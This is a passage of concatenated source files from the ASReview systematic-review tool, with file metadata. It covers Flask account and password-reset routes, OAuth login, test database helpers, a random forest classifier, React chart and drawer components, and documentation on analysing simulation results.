request.form.get(\"password\")\n public = bool(int(request.form.get(\"public\", \"1\")))\n\n # check if email already exists\n user = User.query.filter(\n or_(User.identifier == email, User.email == email)\n ).one_or_none()\n # return error if user doesn't exist\n if isinstance(user, User):\n result = (403, f'User with email \"{email}\" already exists.')\n else:\n try:\n identifier = email\n origin = \"asreview\"\n # are we going to verify the email?\n email_verification = bool(\n current_app.config.get(\"EMAIL_VERIFICATION\", False)\n )\n # set confirmed to False if we 'do' verification. Note\n # that this route only creates 'asreview' accounts\n confirmed = not email_verification\n # create the User account\n user = User(\n identifier=identifier,\n origin=origin,\n email=email,\n name=name,\n affiliation=affiliation,\n password=password,\n confirmed=confirmed,\n public=public,\n )\n # if this is an un-confirmed account, set token\n if not confirmed:\n # set token data\n user = user.set_token_data(\n current_app.config[\"SECRET_KEY\"],\n current_app.config[\"SECURITY_PASSWORD_SALT\"],\n )\n # store user\n DB.session.add(user)\n DB.session.commit()\n # at this stage, if all went well, the User account is\n # stored in the database, send the verification email\n # if applicable\n if email_verification:\n # send email\n send_confirm_account_email(user, request, current_app)\n # result\n result = (\n 201,\n f\"An email has been sent to {user.email} to verify \"\n + \"your account. 
Please follow instructions.\",\n )\n else:\n # result is a 201 with message\n result = (201, f'User \"{identifier}\" created.')\n except IntegrityError as e:\n DB.session.rollback()\n result = (403, f\"Unable to create your account! Reason: {str(e)}\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (403, f\"Unable to create your account! Reason: {str(e)}\")\n else:\n result = (400, \"The app is not configured to create accounts\")\n\n (status, message) = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/confirm_account\", methods=[\"POST\"])\ndef confirm_account():\n \"\"\"Confirms account with email verification\"\"\"\n\n if current_app.config.get(\"EMAIL_VERIFICATION\", False):\n # find user by token and user id\n user_id = request.form.get(\"user_id\", 0)\n token = request.form.get(\"token\", \"\")\n\n user = User.query.filter(\n and_(User.id == user_id, User.token == token)\n ).one_or_none()\n\n if not user:\n result = (404, \"No user account / correct token found.\")\n elif not user.token_valid(token, max_hours=24):\n message = (\n \"Can not confirm account, token has expired. \"\n + 'Use \"forgot password\" to obtain a new one.'\n )\n result = (403, message)\n else:\n user = user.confirm_user()\n try:\n DB.session.commit()\n result = (200, f\"User {user.identifier} confirmed.\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (\n 403,\n f\"Unable to to confirm user {user.identifier}! Reason: {str(e)}\"\n )\n else:\n result = (400, \"The app is not configured to verify accounts.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/get_profile\", methods=[\"GET\"])\n@asreview_login_required\ndef get_profile():\n user = User.query.filter(User.id == current_user.id).one_or_none()\n if user:\n result = (\n 200,\n {\n \"identifier\": user.identifier,\n \"email\": user.email,\n \"origin\": user.origin,\n \"name\": user.name,\n \"affiliation\": user.affiliation,\n \"public\": user.public,\n },\n )\n else:\n result = (404, \"No user found.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/forgot_password\", methods=[\"POST\"])\ndef forgot_password():\n if current_app.config.get(\"EMAIL_CONFIG\", False):\n # get email address from request\n email_address = request.form.get(\"email\", \"\").strip()\n\n # check if email already exists\n user = User.query.filter(\n or_(User.identifier == email_address, User.email == email_address)\n ).one_or_none()\n\n if not user:\n result = (404, f'User with email \"{email_address}\" not found.')\n elif user.origin != \"asreview\":\n result = (404, f\"Your account has been created with {user.origin}.\")\n else:\n # set a token\n user = user.set_token_data(\n current_app.config[\"SECRET_KEY\"],\n current_app.config[\"SECURITY_PASSWORD_SALT\"],\n )\n try:\n # store data\n DB.session.commit()\n # send email\n send_forgot_password_email(user, request, current_app)\n # result\n result = (200, f\"An email has been sent to {email_address}\")\n\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (403, f\"Unable to to confirm user! 
Reason: {str(e)}\")\n else:\n result = (404, \"Forgot-password feature is not used in this app.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/reset_password\", methods=[\"POST\"])\ndef reset_password():\n \"\"\"Resests password of user\"\"\"\n if current_app.config.get(\"EMAIL_CONFIG\", False):\n\n new_password = request.form.get(\"password\", \"\").strip()\n token = request.form.get(\"token\", \"\").strip()\n user_id = request.form.get(\"user_id\", \"0\").strip()\n user = User.query.filter(User.id == user_id).one_or_none()\n\n if not user:\n result = (\n 404,\n \"User not found, try restarting the forgot-password procedure.\"\n )\n elif not user.token_valid(token, max_hours=24):\n result = (\n 404,\n \"Token is invalid or too old, restart the forgot-password procedure.\"\n )\n else:\n try:\n user = user.reset_password(new_password)\n DB.session.commit()\n result = (200, \"Password updated.\")\n except ValueError as e:\n DB.session.rollback()\n result = (500, f\"Unable to reset your password! Reason: {str(e)}\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (500, f\"Unable to reset your password! Reason: {str(e)}\")\n else:\n result = (404, \"Reset-password feature is not used in this app.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/update_profile\", methods=[\"POST\"])\n@asreview_login_required\ndef update_profile():\n \"\"\"Update user profile\"\"\"\n user = User.query.filter(User.id == current_user.id).one_or_none()\n if user:\n email = request.form.get(\"email\", \"\").strip()\n name = request.form.get(\"name\", \"\").strip()\n affiliation = request.form.get(\"affiliation\", \"\").strip()\n password = request.form.get(\"password\", None)\n public = bool(int(request.form.get(\"public\", \"1\")))\n\n try:\n user = user.update_profile(email, name, affiliation, password, public)\n DB.session.commit()\n result = (200, \"User profile updated.\")\n except ValueError as e:\n result = (500, f\"Unable to update your profile! Reason: {str(e)}\")\n except IntegrityError as e:\n DB.session.rollback()\n result = (500, f\"Unable to update your profile! Reason: {str(e)}\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (500, f\"Unable to update your profile! 
Reason: {str(e)}\")\n\n else:\n result = (404, \"No user found\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/refresh\", methods=[\"GET\"])\ndef refresh():\n if current_user and isinstance(current_user, User):\n logged_in = current_user.is_authenticated\n name = current_user.get_name()\n id = current_user.id\n else:\n logged_in = False\n name = \"\"\n id = None\n\n result = {\"logged_in\": logged_in, \"name\": name, \"id\": id}\n\n response = jsonify(result)\n return response, 200\n\n\[email protected](\"/signout\", methods=[\"DELETE\"])\n@asreview_login_required\ndef signout():\n if current_user:\n identifier = current_user.identifier\n logout_user()\n result = (200, f\"User with identifier {identifier} has been signed out.\")\n else:\n result = (404, \"No user found, no one can be signed out.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/oauth_callback\", methods=[\"POST\"])\ndef oauth_callback():\n # get parameters\n code = request.form.get(\"code\", \"\").strip()\n provider = request.form.get(\"provider\", \"\").strip()\n redirect_uri = request.form.get(\"redirect_uri\", \"\").strip()\n\n # assuming we have this provider\n oauth_handler = current_app.config.get(\"OAUTH\", False)\n if (\n isinstance(oauth_handler, OAuthHandler)\n and provider in oauth_handler.providers()\n ):\n # get user credentials for this user\n (identifier, email, name) = oauth_handler.get_user_credentials(\n provider, code, redirect_uri\n )\n # try to find this user\n user = User.query.filter(User.identifier == identifier).one_or_none()\n # flag for response (I'd like to communicate if this user was created)\n created_account = False\n # if not create user\n if user is None:\n try:\n origin = provider\n confirmed = True\n public = True\n user = User(\n identifier=identifier,\n origin=origin,\n email=email,\n name=name,\n confirmed=confirmed,\n public=public,\n )\n DB.session.add(user)\n DB.session.commit()\n created_account = True\n except SQLAlchemyError:\n DB.session.rollback()\n message = \"OAuth: unable to create your account!\"\n # return this immediately\n return jsonify({\"data\": message}), 500\n\n # log in the existing/created user immediately\n logged_in = perform_login_user(user)\n result = (\n 200,\n {\n \"account_created\": created_account,\n \"logged_in\": logged_in,\n \"name\": user.get_name(),\n \"id\": user.id,\n },\n )\n else:\n result = (400, {\"data\": f\"OAuth provider {provider} could not be found\"})\n\n status, message = result\n response = jsonify(message)\n return response, status\n" }, { "alpha_fraction": 0.6951219439506531, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 48.20000076293945, "blob_id": "e0eb58332be6d4a720feb861e35ee50c5cc6f633", "content_id": "156931c2aa65c600a170b3c3a660271524f45959", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 246, "license_type": "permissive", "max_line_length": 53, "num_lines": 5, "path": "/asreview/webapp/src/icons/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as CoronaIcon } from \"./CoronaIcon\";\nexport { default as ElasIcon } from \"./ElasIcon\";\nexport { default as PlusIcon } from \"./PlusIcon\";\nexport { default as DOIIcon } from \"./DOIIcon\";\nexport { default as Orcid } from \"./Orcid\";\n" }, { "alpha_fraction": 0.7848324775695801, 
"alphanum_fraction": 0.7848324775695801, "avg_line_length": 69.8125, "blob_id": "02388ed033e07a0a5c4b64aaf85406b24945da40", "content_id": "3d32243ab01eb641af64d5f20b465062f676dfd4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1134, "license_type": "permissive", "max_line_length": 449, "num_lines": 16, "path": "/docs/source/simulation_results.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "\nAnalyzing results\n=================\n\nAfter a simulation, the results are stored in the ASReview project file\n(extension `.asreview`). This file contains a large number of variables and\nlogs on the simulation. The data can be extracted from the project file via the API or with one of the available extensions. See :doc:`these examples on the Project API <example_api_asreview_file>` for more information about opening the project file. \n\nOne readily available extension for analyzing the results of a simulation is `ASReview Insights <https://github.com/asreview/asreview-insights>`_. This extension offers valuable tools for plotting the recall and extracting the statistical results of several performance metrics, such as the Work Saved over Sampling (WSS), the proportion of Relevant Record Found (RRF), the Extra Relevant records Found (ERF), and the Average Time to Discover (ATD).\n\nInstall ASReview Insights directly from PyPi:\n\n.. code-block:: bash\n\n\tpip install asreview-insights\n\nDetailed documentation on the extension can be found on the `ASReview Insights <https://github.com/asreview/asreview-insights>`_ project page.\n" }, { "alpha_fraction": 0.6786279678344727, "alphanum_fraction": 0.6799472570419312, "avg_line_length": 22.6875, "blob_id": "fa412e7986562f374da85502c6478f29225549d4", "content_id": "2722402cd69ceff10115080f023cc69285db74ce", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3790, "license_type": "permissive", "max_line_length": 85, "num_lines": 160, "path": "/asreview/webapp/tests/utils/crud.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import asreview.webapp.tests.utils.config_parser as cp\nfrom asreview.webapp.authentication.models import Collaboration\nfrom asreview.webapp.authentication.models import CollaborationInvitation\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.authentication.models import User\n\n\ndef create_user(DB, user=1):\n if isinstance(user, int):\n user = cp.get_user(user)\n try:\n DB.session.add(user)\n DB.session.commit()\n user = User.query.order_by(User.id.desc()).first()\n except Exception as exception:\n user = False\n DB.session.rollback()\n DB.session.flush()\n raise exception\n return user\n\n\ndef get_user_by_id(id):\n return User.query.filter_by(id=id).one()\n\n\ndef get_user_by_identifier(id):\n return User.query.filter_by(identifier=id).one()\n\n\ndef list_users():\n return User.query.all()\n\n\ndef count_users():\n return len(User.query.with_entities(User.id).all())\n\n\ndef update_user(DB, user, attribute, value):\n user = get_user_by_identifier(user.identifier)\n setattr(user, attribute, value)\n DB.session.commit()\n return user\n\n\ndef last_user():\n return User.query.order_by(User.id.desc()).first()\n\n\ndef delete_users(DB):\n DB.session.query(User).delete()\n DB.session.commit()\n\n\ndef delete_collaborations(DB):\n DB.session.query(Collaboration).delete()\n DB.session.commit()\n\n\ndef 
delete_invitations(DB):\n DB.session.query(CollaborationInvitation).delete()\n DB.session.commit()\n\n\ndef delete_projects(DB):\n DB.session.query(Project).delete()\n DB.session.commit()\n\n\ndef delete_everything(DB):\n DB.drop_all()\n\n\ndef create_project(DB, user, project):\n try:\n user.projects.append(project)\n DB.session.commit()\n id = project.project_id\n project = Project.query.filter_by(project_id=id).one()\n except Exception as exception:\n project = False\n DB.session.rollback()\n DB.session.flush()\n raise exception\n return project\n\n\ndef get_project_by_project_id(id):\n return Project.query.filter_by(project_id=id).one()\n\n\ndef list_projects():\n return Project.query.all()\n\n\ndef count_projects():\n return len(Project.query.with_entities(Project.id).all())\n\n\ndef last_project():\n return Project.query.order_by(Project.id.desc()).first()\n\n\ndef create_invitation(DB, project, user):\n try:\n inv = CollaborationInvitation(project_id=project.id, user_id=user.id)\n DB.session.add(inv)\n DB.session.commit()\n except Exception as exception:\n DB.session.rollback()\n DB.session.flush()\n raise exception\n\n\ndef list_invitations():\n return CollaborationInvitation.query.all()\n\n\ndef last_invitation():\n return CollaborationInvitation.query.order_by(\n CollaborationInvitation.id.desc()\n ).first()\n\n\ndef count_invitations():\n return len(\n CollaborationInvitation.query.with_entities(CollaborationInvitation.id).all()\n )\n\n\ndef create_collaboration(DB, project, user):\n try:\n coll = Collaboration(project_id=project.id, user_id=user.id)\n DB.session.add(coll)\n DB.session.commit()\n except Exception as exception:\n DB.session.rollback()\n DB.session.flush()\n raise exception\n\n\ndef list_collaborations():\n return Collaboration.query.all()\n\n\ndef last_collaboration():\n return Collaboration.query.order_by(Collaboration.id.desc()).first()\n\n\ndef count_collaborations():\n return len(Collaboration.query.with_entities(Collaboration.id).all())\n\n\ndef create_user1_with_2_projects(DB):\n user = create_user(DB)\n project_ids = [\"project-1\", \"project-2\"]\n projects = [Project(project_id=p) for p in project_ids]\n user.projects = projects\n DB.session.commit()\n return user, projects\n" }, { "alpha_fraction": 0.663431704044342, "alphanum_fraction": 0.6781832575798035, "avg_line_length": 35.79999923706055, "blob_id": "f4b79da4af627cfcfd057370ae1bf1021c127433", "content_id": "8431dd04018738f67c76ee725ed0821792674966", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2576, "license_type": "permissive", "max_line_length": 84, "num_lines": 70, "path": "/asreview/models/classifiers/rf.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom sklearn.ensemble import RandomForestClassifier as SKRandomForestClassifier\n\nfrom asreview.models.classifiers.base import BaseTrainClassifier\nfrom asreview.models.classifiers.utils import _set_class_weight\n\n\nclass RandomForestClassifier(BaseTrainClassifier):\n \"\"\"\n Random forest classifier (``rf``).\n\n The Random Forest classifier is an implementation based\n on the sklearn Random Forest classifier.\n\n Arguments\n ---------\n n_estimators : int, default=100\n The number of trees in the forest.\n max_features: int, default=10\n Number of features in the model.\n class_weight: float, default=1.0\n Class weight of the inclusions.\n random_state : int or RandomState, default=None\n Controls both the randomness of the bootstrapping of the samples used\n when building trees and the sampling of the features to consider when\n looking for the best split at each node.\n \"\"\"\n\n name = \"rf\"\n label = \"Random forest\"\n\n def __init__(\n self, n_estimators=100, max_features=10, class_weight=1.0, random_state=None\n ):\n super(RandomForestClassifier, self).__init__()\n self.n_estimators = int(n_estimators)\n self.max_features = int(max_features)\n self.class_weight = class_weight\n self._random_state = random_state\n\n self._model = SKRandomForestClassifier(\n n_estimators=self.n_estimators,\n max_features=self.max_features,\n class_weight=_set_class_weight(class_weight),\n random_state=random_state,\n )\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_choices = {}\n hyper_space = {\n \"mdl_n_estimators\": hp.quniform(\"mdl_n_estimators\", 10, 100, 1),\n \"mdl_max_features\": hp.quniform(\"mdl_max_features\", 6, 10, 1),\n \"mdl_class_weight\": hp.lognormal(\"mdl_class_weight\", 0, 1),\n }\n return hyper_space, hyper_choices\n" }, { "alpha_fraction": 0.579059362411499, "alphanum_fraction": 0.585442304611206, "avg_line_length": 27.259492874145508, "blob_id": "d0807f0c6a508074fd2c04f3990ce8e22f2eb340", "content_id": "e56d98703157222faea586c4342330d1246630ac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8930, "license_type": "permissive", "max_line_length": 124, "num_lines": 316, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ProgressRecallChart.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport Chart from \"react-apexcharts\";\nimport { Card, CardContent, Stack, Typography } from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\n\nimport { CardErrorHandler } from \"../../Components\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nconst PREFIX = \"ProgressRecallChart\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n tooltipCardColor: `${PREFIX}-tooltip-card-color`,\n tooltipLabelContainer: `${PREFIX}-tooltip-label-container`,\n 
tooltipLabelMarkerASReviewColor: `${PREFIX}-tooltip-label-marker-asreview-color`,\n tooltipLabelMarkerRandomColor: `${PREFIX}-tooltip-label-marker-random-color`,\n tooltipLabelASReviewNumber: `${PREFIX}-tooltip-label-asreview-number`,\n tooltipLabelRandomNumber: `${PREFIX}-tooltip-label-random-number`,\n tooltipLabelTextSecondaryColor: `${PREFIX}-tooltip-label-text-secondary-color`,\n tooltipDividerColor: `${PREFIX}-tooltip-divider-color`,\n};\n\nconst StyledCard = styled(Card)(({ theme }) => ({\n borderRadius: 16,\n maxWidth: 960,\n overflow: \"visible\",\n position: \"relative\",\n width: \"100%\",\n [`& .${classes.root}`]: {\n paddingTop: 24,\n paddingLeft: 32,\n paddingRight: 32,\n },\n\n [`& .${classes.tooltipCardColor}`]: {\n color: theme.palette.text.primary,\n background: theme.palette.background.paper,\n },\n\n [`& .${classes.tooltipLabelContainer}`]: {\n display: \"flex\",\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.tooltipLabelMarkerASReviewColor}`]: {\n ...(theme.palette.mode === \"light\" && {\n color: theme.palette.primary.light,\n background: theme.palette.primary.light,\n }),\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.primary.main,\n background: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelMarkerRandomColor}`]: {\n ...(theme.palette.mode === \"light\" && {\n color: theme.palette.secondary.light,\n background: theme.palette.secondary.light,\n }),\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.secondary.main,\n background: theme.palette.secondary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelASReviewNumber}`]: {\n marginLeft: 32,\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelRandomNumber}`]: {\n marginLeft: 32,\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.secondary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelTextSecondaryColor}`]: {\n color: theme.palette.text.secondary,\n },\n\n [`& .${classes.tooltipDividerColor}`]: {\n borderColor: theme.palette.divider,\n },\n}));\n\nconst customTooltip = ({ series, seriesIndex, dataPointIndex, w }) => {\n let total = dataPointIndex + 1;\n return (\n `<div class=\"tooltip-card ProgressRecallChart-tooltip-card-color\">` +\n `<div class=\"tooltip-card-content\">` +\n '<h6 class=\"tooltip-title\">' +\n total +\n ` reviewed records` +\n \"</h6>\" +\n '<div class=\"ProgressRecallChart-tooltip-label-container\">' +\n \"<div>\" +\n \"<div>\" +\n `<span class=\"apexcharts-legend-marker tooltip-label-marker ProgressRecallChart-tooltip-label-marker-asreview-color\">` +\n \"</span>\" +\n `<span class=\"apexcharts-legend-text tooltip-label-text\">` +\n \"Relevant by ASReview LAB\" +\n \"</span>\" +\n \"</div>\" +\n `<p class=\"tooltip-label-text-secondary ProgressRecallChart-tooltip-label-text-secondary-color\">` +\n \"Relevant records that you labeled assisted by the active learning model\" +\n \"</p>\" +\n \"</div>\" +\n `<h6 class=\"tooltip-label-number ProgressRecallChart-tooltip-label-asreview-number\">` +\n series[0][dataPointIndex] +\n \"</h6>\" +\n \"</div>\" +\n `<hr class=\"tooltip-divider ProgressRecallChart-tooltip-divider-color\">` +\n '<div class=\"ProgressRecallChart-tooltip-label-container\">' +\n \"<div>\" +\n \"<div>\" +\n `<span class=\"apexcharts-legend-marker tooltip-label-marker ProgressRecallChart-tooltip-label-marker-random-color\">` +\n \"</span>\" +\n `<span class=\"apexcharts-legend-text tooltip-label-text\">` +\n \"Random relevant\" +\n 
\"</span>\" +\n \"</div>\" +\n `<p class=\"tooltip-label-text-secondary ProgressRecallChart-tooltip-label-text-secondary-color\">` +\n \"Relevant records that you might find if you manually reviewed all the records\" +\n \"</p>\" +\n \"</div>\" +\n `<h6 class=\"tooltip-label-number ProgressRecallChart-tooltip-label-random-number\">` +\n series[1][dataPointIndex] +\n \"</h6>\" +\n \"</div>\" +\n \"</div>\" +\n \"</div>\"\n );\n};\n\nexport default function ProgressRecallChart(props) {\n const theme = useTheme();\n\n const lightModePrimaryColor = React.useCallback(() => {\n return theme.palette.mode === \"light\"\n ? theme.palette.primary.light\n : theme.palette.primary.main;\n }, [theme.palette.mode, theme.palette.primary]);\n\n const lightModeSecondaryColor = React.useCallback(() => {\n return theme.palette.mode === \"light\"\n ? theme.palette.secondary.light\n : theme.palette.secondary.main;\n }, [theme.palette.mode, theme.palette.secondary]);\n\n /**\n * Chart data array\n */\n const seriesArray = React.useCallback(() => {\n if (props.progressRecallQuery.data) {\n return [\n {\n name: \"Relevant by ASReview LAB\",\n data: props.progressRecallQuery.data?.asreview,\n },\n {\n name: \"Random relevant\",\n data: props.progressRecallQuery.data?.random,\n },\n ];\n } else {\n return [];\n }\n }, [props.progressRecallQuery.data]);\n\n const maxY = React.useCallback(() => {\n if (seriesArray()[0]?.data !== undefined) {\n return Math.max.apply(\n Math,\n seriesArray()[0]?.data.map((element) => {\n return element.y;\n }),\n );\n } else {\n return undefined;\n }\n }, [seriesArray]);\n\n /**\n * Chart options\n */\n const optionsChart = React.useCallback(() => {\n return {\n chart: {\n animations: {\n enabled: false,\n },\n background: \"transparent\",\n id: \"ASReviewLABprogressRecall\",\n type: \"line\",\n toolbar: {\n show: !props.mobileScreen,\n },\n zoom: {\n enabled: false,\n },\n },\n colors: [lightModePrimaryColor(), lightModeSecondaryColor()],\n dataLabels: {\n enabled: false,\n },\n legend: {\n position: \"top\",\n horizontalAlign: \"left\",\n fontSize: !props.mobileScreen ? \"14px\" : \"12px\",\n fontFamily: theme.typography.subtitle2.fontFamily,\n fontWeight: theme.typography.subtitle2.fontWeight,\n labels: {\n colors: theme.palette.text.secondary,\n },\n markers: {\n width: 8,\n height: 8,\n offsetX: -4,\n },\n itemMargin: {\n horizontal: 16,\n },\n },\n markers: {\n size: 0,\n },\n noData: {\n text: \"No data available\",\n },\n stroke: {\n curve: \"smooth\",\n lineCap: \"round\",\n width: 2,\n },\n theme: {\n mode: theme.palette.mode,\n },\n tooltip: {\n custom: customTooltip,\n },\n xaxis: {\n decimalsInFloat: 0,\n labels: {\n show: true,\n },\n title: {\n text: \"Number of reviewed records\",\n },\n type: \"numeric\",\n axisTicks: {\n show: false,\n },\n tooltip: {\n enabled: false,\n },\n },\n yaxis: {\n labels: {\n formatter: function (val, index) {\n return val.toFixed();\n },\n },\n showAlways: false,\n max: maxY(),\n forceNiceScale: false,\n tickAmount: maxY() < 6 ? 
maxY() : 6,\n title: {\n text: \"Number of relevant records\",\n },\n },\n };\n }, [\n theme,\n lightModePrimaryColor,\n lightModeSecondaryColor,\n maxY,\n props.mobileScreen,\n ]);\n\n const [series, setSeries] = React.useState(seriesArray());\n const [options, setOptions] = React.useState(optionsChart());\n\n React.useEffect(() => {\n setSeries(seriesArray());\n setOptions(optionsChart());\n }, [seriesArray, optionsChart]);\n\n return (\n <StyledCard elevation={2}>\n <CardErrorHandler\n queryKey={\"fetchProgressRecall\"}\n error={props.progressRecallQuery.error}\n isError={props.progressRecallQuery.isError}\n />\n <CardContent className={classes.root}>\n <Stack spacing={2}>\n {!props.mobileScreen && <Typography variant=\"h6\">Recall</Typography>}\n {props.mobileScreen && (\n <TypographySubtitle1Medium>Recall</TypographySubtitle1Medium>\n )}\n <Chart\n options={options}\n series={series}\n type=\"line\"\n height={400}\n width=\"100%\"\n />\n </Stack>\n </CardContent>\n </StyledCard>\n );\n}\n" }, { "alpha_fraction": 0.5636661052703857, "alphanum_fraction": 0.5669394731521606, "avg_line_length": 22.5, "blob_id": "1615c43c7c6b5a20d57e44cc01a193afa18bb01e", "content_id": "f19a23ce81da59eb642aae3d38518bbdf96efbd4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3055, "license_type": "permissive", "max_line_length": 77, "num_lines": 130, "path": "/asreview/webapp/src/Components/DrawerItem.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n useMatch,\n useNavigate,\n useParams,\n useResolvedPath,\n} from \"react-router-dom\";\nimport {\n ListItemButton,\n ListItemIcon,\n ListItemText,\n Tooltip,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport {\n ArrowBack,\n Assignment,\n Assessment,\n Dashboard,\n Download,\n Edit,\n History,\n PeopleAlt,\n} from \"@mui/icons-material\";\n\nconst PREFIX = \"DrawerItem\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n icon: `${PREFIX}-icon`,\n textSelected: `${PREFIX}-textSelected`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.root}`]: {\n [`:before`]: {\n top: 0,\n left: 0,\n width: 4,\n height: \"100%\",\n content: \"' '\",\n position: \"absolute\",\n backgroundColor: theme.palette.primary.main,\n },\n },\n\n [`& .${classes.icon}`]: {\n paddingLeft: 8,\n },\n\n [`& .${classes.textSelected}`]: {\n color: theme.palette.primary.main,\n fontWeight: 600,\n },\n}));\n\nconst DrawerItem = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n\n const resolved = useResolvedPath(props.path);\n const match = useMatch({ path: resolved.pathname, end: true });\n\n const returnSelectedState = () => {\n return match !== null;\n };\n\n const returnIconColor = () => {\n return returnSelectedState() ? 
\"primary\" : \"inherit\";\n };\n\n const returnIconState = () => {\n // home page navigation\n if (!project_id && props.label === \"Projects\") {\n return <Dashboard color={returnIconColor()} />;\n }\n\n // project page navigation\n if (project_id && props.label === \"Projects\") {\n return <ArrowBack />;\n }\n if (props.label === \"Analytics\") {\n return <Assessment color={returnIconColor()} />;\n }\n if (props.label === \"Review\") {\n return <Assignment color={returnIconColor()} />;\n }\n if (props.label === \"History\") {\n return <History color={returnIconColor()} />;\n }\n if (props.label === \"Team\") {\n return <PeopleAlt color={returnIconColor()} />;\n }\n if (props.label === \"Export\") {\n return <Download color={returnIconColor()} />;\n }\n if (props.label === \"Details\") {\n return <Edit color={returnIconColor()} />;\n }\n };\n\n return (\n <Root>\n <Tooltip disableHoverListener={props.onNavDrawer} title={props.label}>\n <ListItemButton\n selected={returnSelectedState()}\n onClick={() => {\n if (props.mobileScreen) {\n props.toggleNavDrawer();\n }\n navigate(props.path);\n }}\n className={returnSelectedState() ? classes.root : null}\n >\n <ListItemIcon className={classes.icon}>\n {returnIconState()}\n </ListItemIcon>\n <ListItemText\n primary={props.label}\n primaryTypographyProps={{\n className: returnSelectedState() ? classes.textSelected : null,\n }}\n />\n </ListItemButton>\n </Tooltip>\n </Root>\n );\n};\n\nexport default DrawerItem;\n" }, { "alpha_fraction": 0.5978330373764038, "alphanum_fraction": 0.5995438098907471, "avg_line_length": 33.133819580078125, "blob_id": "43942a5c900055e204a067181918390c07d39cd2", "content_id": "c4036acd6b6ba4e0988e323faa718795f0845dcb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14029, "license_type": "permissive", "max_line_length": 86, "num_lines": 411, "path": "/asreview/entry_points/simulate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Simulation entry point and utils.\"\"\"\n\nimport argparse\nimport logging\nimport shutil\nfrom pathlib import Path\n\nfrom asreview.compat import convert_id_to_idx\nfrom asreview.config import DEFAULT_BALANCE_STRATEGY\nfrom asreview.config import DEFAULT_FEATURE_EXTRACTION\nfrom asreview.config import DEFAULT_MODEL\nfrom asreview.config import DEFAULT_N_INSTANCES\nfrom asreview.config import DEFAULT_N_PRIOR_EXCLUDED\nfrom asreview.config import DEFAULT_N_PRIOR_INCLUDED\nfrom asreview.config import DEFAULT_QUERY_STRATEGY\nfrom asreview.data import ASReviewData\nfrom asreview.data import load_data\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.models.balance.utils import get_balance_model\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.query import get_query_model\nfrom 